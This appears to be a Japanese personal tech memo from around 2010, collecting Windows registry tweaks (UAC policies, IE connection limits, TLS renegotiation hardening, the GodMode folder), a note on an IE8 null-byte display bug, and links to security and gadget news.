NotSpecified すべての項目
Contacts 連絡先
Documents ドキュメント
Pictures 画像またはビデオ
Music 音楽の詳細
MusicIcons ミュージック・アイコン
http://www.atmarkit.co.jp/fwin2k/win2ktips/1022foldertype/foldertype.html
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell
値の名前 : BagMRU Size
データ型 : REG_DWORD
値 : 1
http://journal.mycom.co.jp/column/windows/016/index.html
名前の変更して勝手にソートするのは勘弁してほしい・・・(必要ならF5キー押すちゅーねん)
フォルダを新規作成し、GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} とリネームすると
GodMode というコントロールパネルになって1画面で操作できるようになるんだとか。
ちなみに Windows Server 2008 R2 でもいけました。
http://www.gizmodo.jp/2010/01/windows7_2.html
Windows 7/Server 2008 R2でクイック起動バーを利用する
http://www.atmarkit.co.jp/fwin2k/win2ktips/1262qlnch/qlnch.html
幻に終わったXboxのドリームキャスト互換・今明かされるその理由
http://news.livedoor.com/article/detail/4548265/
今からでも遅くないから、、、ついでに X68000 も・・・
PowerPC 乗せるみたいだし。
Xbob360の次世代機いよいよ登場か! Xboxポータブル情報も
http://news.livedoor.com/article/detail/4460499/
終身保険は解約しないと損! “保険なし”でも何とかなる理由
http://trendy.nikkeibp.co.jp/article/pickup/20100108/1030735/?P=1
景気が良かった頃に加入している場合は、金利が銀行よりも良いから解約すると損になると思うが・・・
ASAHIネットの固定IP
http://asahi-net.jp/biz/service/option/fixedip/service.html
これいいかも、VPNとかサーバーのメンテナンス用にIPアドレス絞り込むのに。
短期間(1ヶ月だけとか)の場合は、ライブドアなんかを。
http://provider.livedoor.com/
x64 OS でアプリケーションが不安定になる場合
64 ビット バージョンの Windows で動作するアプリケーションからスローされる例外は無視されます。
http://support.microsoft.com/default.aspx/kb/976038
上記で修正パッチを適用後に下記レジストリを追加(未検証)
システム レベルで有効にする
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
値の名前 : DisableUserModeCallbackFilter
データ型 : REG_DWORD
値 : 1
プロセス レベルで有効にする
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Notepad.exe を追加する場合は、この下に新しいレジストリ サブキー"Notepad.exe"を追加。
後は、サブキーの下に追加
値の名前 : DisableUserModeCallbackFilter
データ型 : REG_DWORD
値 : 1
IE8のバグ?
ASP.NET で HttpUtility.UrlDecode を使って %00 を出力すると、以降のソースが表示されない。
http://www.kojikoji.net/?test=%00
HttpUtility.HtmlDecode は確認してません。また、ファイアフォックス3.6では問題ない。
携帯向けのサービスで、パスワードに数字しか設定してない、設定できない。。。と・・・
ウェブの利用はパソコンからスマートフォンへ--ガートナー予測
http://japan.cnet.com/marketing/story/0,3800080523,20406694,00.htm
携帯サイトを装うフィッシングに注意
http://www.nikkeibp.co.jp/article/column/20100125/206930/
123456にiloveyou…… 流出事件で最も利用されていた平凡すぎるパスワード
http://journal.mycom.co.jp/news/2010/01/25/006/?rt=m&t=o&n=2949
UAC コントロールのレジストリ位置
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
管理者に対する昇格時の動作(管理者承認モードでの管理者に対する昇格時のプロンプトの動作)
値の名前 : ConsentPromptBehaviorAdmin
データ型 : REG_DWORD
値 : 2(0〜5)
VISTA Windows7
確認を要求しないで昇格する(0) 確認を要求しないで昇格する(0)
資格情報を要求する(1) セキュリティで保護された」デスクトップで資格情報を要求する(1)
同意を要求する(2) セキュリティで保護された」デスクトップで同意を要求する(2)
資格情報を要求する(3)
同意を要求する(4)
Windows以外のバイナリに対する同意を要求する(5)
セキュアデスクトップ(昇格のプロンプト時にセキュリティで保護されたデスクトップに切り替える)
値の名前 : PromptOnSecureDesktop
データ型 : REG_DWORD
値 : 1 (0で無効)
管理者承認モードですべての管理者を実行
値の名前 : EnableLUA
データ型 : REG_DWORD
値 : 1 (0で無効)
アプリケーションインストール時に昇格をプロンプト
値の名前 : EnableInstallerDetection
データ型 : REG_DWORD
値 : 1 (0で無効)
他にもあるけど詳しくは
Windows Vista セキュリティ ガイド
http://technet.microsoft.com/ja-jp/windows/bb629436.aspx
67 Win 7編: UAC設定をレジストリから制御し、スムーズなセキュリティ設定を実現する
http://journal.mycom.co.jp/column/windows/067/
コメントタグに重要なファイルをリンクで残しておくと・・・
ファイルを抜かれますので注意しましょう。
サイバー攻撃の拡大を企業のセキュリティ担当幹部は懸念--マカフィー報告
http://itpro.nikkeibp.co.jp/article/MAG/20100129/343924/
中国発のサイバー攻撃は「重大なターニングポイント」--マカフィー幹部が言及
http://japan.cnet.com/news/sec/story/0,2000056024,20406815,00.htm
ダミーファイルを用意して、アクセスがある IP はブロックするとか
やった方がいいのかも...
中国とか機密情報集めてそうだし。。。
サイバー戦争はもう始まってる?
IE の同時ダウンロード数を変更
同時に16個ダウンロードできるように変更
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
値の名前 : MaxConnectionsPer1_0Server
データ型 : REG_DWORD
値 : 0x10
値の名前 : MaxConnectionsPerServer
データ型 : REG_DWORD
値 : 0x10
IE8 の場合
HTTP 1.1 接続で使用する接続制限を変更
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
値の名前 : iexplore.exe
データ型 : REG_DWORD
値 : 0x10
※IE7 までは 2つ IE8 で6個になっています。
参考
一度に 3 つ以上のファイルをダウンロードできるように Internet Explorer を構成する方法
http://support.microsoft.com/kb/282402/ja
TLS/SSL 再ネゴシエーションを無効にする
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL
値の名前 : DisableRenegoOnClient
データ型 : REG_DWORD
値 : 1
0 又は値が存在しない場合:
クライアントは再ネゴシエーションを開始する。
クライアントは再ネゴシエーションに応答する。
0以外: クライアントは再ネゴシエーションを開始しない。
クライアントは再ネゴシエーションに応答しない。
値の名前 : DisableRenegoOnServer
データ型 : REG_DWORD
値 : 1
0 又は値が存在しない場合:
サーバーが開始する再ネゴシエーションは許可される。
クライアントは再ネゴシエーションに応答する。
0以外: サーバーが開始する再ネゴシエーションは許可されない。
サーバーはクライアントからの再ネゴシエーション要求に応答する。
参考
マイクロソフト セキュリティ アドバイザリ: TLS/SSL の脆弱性により、なりすましが行われる
http://support.microsoft.com/kb/977377
USTREAM と twitter
ストリーム放送局が流行るのかな・・・
Portable tool
USBメモリー常備ソフト9
http://pc.nikkeibp.co.jp/article/special/20100224/1023170/
厳選 USBメモリーで持ち運べるフリーソフト
http://pc.nikkeibp.co.jp/article/special/20090624/1016321/
USB Tools
http://usbtools.jp/